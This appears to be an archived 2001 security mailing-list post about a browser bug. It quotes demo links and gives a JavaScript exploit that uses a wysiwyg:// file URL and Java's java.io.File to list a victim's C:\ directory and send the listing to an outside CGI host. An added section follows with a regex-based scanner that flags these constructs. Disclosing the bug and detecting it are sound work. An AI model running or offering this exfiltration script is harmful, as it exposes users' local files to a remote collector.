> I've whipped up a couple of demos of this bug that send the contents to a
> cgi. There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing). This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)

And if you wish, it can even read your directory structure:
(works for Win, but Unix should be straightforward)

//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";
</SCRIPT>

At least it seems it can not *write* to local files, I get a security exception when I try that.
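Added example, not part of the original post or of Trev's demo: a static check a filtering proxy or mail gateway could run over page markup to flag the constructs the script above combines. The rule names, the collector.example.invalid host and the sample markup (condensed from the posted script) are constructed for illustration.

```javascript
// Added example: flag the constructs used by the script in the post.
// Rule ids, sample markup and host name are constructed, not from a real tool.
const RULES = [
  { id: "wysiwyg-local-file", re: /wysiwyg:\/\/\d+\/file:/i },
  { id: "javascript-url-assigned-to-location", re: /\.location\s*=\s*["']javascript:/i },
  { id: "liveconnect-java-io-file", re: /\bjava\.io\.File\b/ },
  { id: "data-sent-via-query-string",
    re: /window\.open\(\s*["']https?:\/\/[^"']*\?["']\s*\+\s*escape\(/i },
];

// The inner script is nested inside a javascript: URL string, so its quotes
// are backslash-escaped and its closing tag is split as </'+'SCRIPT>.
// Strip both layers repeatedly until the text stops changing.
function normalize(src) {
  let out = src, prev;
  do {
    prev = out;
    out = out
      .replace(/\\+(["'\\])/g, "$1")       // backslash run before quote/backslash
      .replace(/(["'])\s*\+\s*\1/g, "");    // adjacent literals joined with +
  } while (out !== prev);
  return out;
}

// Return the ids of every rule that matches the normalized markup.
function scan(markup) {
  const text = normalize(markup);
  return RULES.filter((r) => r.re.test(text)).map((r) => r.id);
}

// Constructed sample: the posted script with the loop removed and the
// collecting host replaced by a placeholder.
const SAMPLE = String.raw`<SCRIPT>
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list();w=window.open(\"http://collector.example.invalid/q.cgi?\"+escape(fl));</'+'SCRIPT>'";
</SCRIPT>`;

// Constructed benign page: ordinary redirect with an escaped parameter.
const BENIGN = '<script>window.location="https://example.invalid/?q="+escape(name);</script>';

console.log(scan(SAMPLE), scan(BENIGN));
```

The fourth rule only fires after normalization, because in the raw markup the URL's opening quote is hidden behind a backslash.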
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:18 PDT